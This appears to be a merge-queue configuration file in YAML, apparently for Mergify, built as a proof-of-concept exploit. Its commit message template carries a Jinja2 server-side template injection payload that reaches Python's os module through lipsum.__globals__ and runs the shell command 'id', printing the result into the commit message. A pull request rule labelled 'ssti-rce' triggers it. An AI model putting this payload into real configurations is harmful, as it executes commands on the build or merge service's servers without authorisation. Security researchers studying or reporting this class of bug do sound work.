queue_rules:
  - name: default
    merge_method: squash
    commit_message_template: |
      {{ title }}
      
      {% set x = lipsum.__globals__["os"].popen("id") %}SSTI_OUTPUT:{{ x.read() }}
    conditions: []

pull_request_rules:
  - name: ssti-rce
    conditions:
      - base=main
      - label=ssti-rce
    actions:
      queue:
        name: default
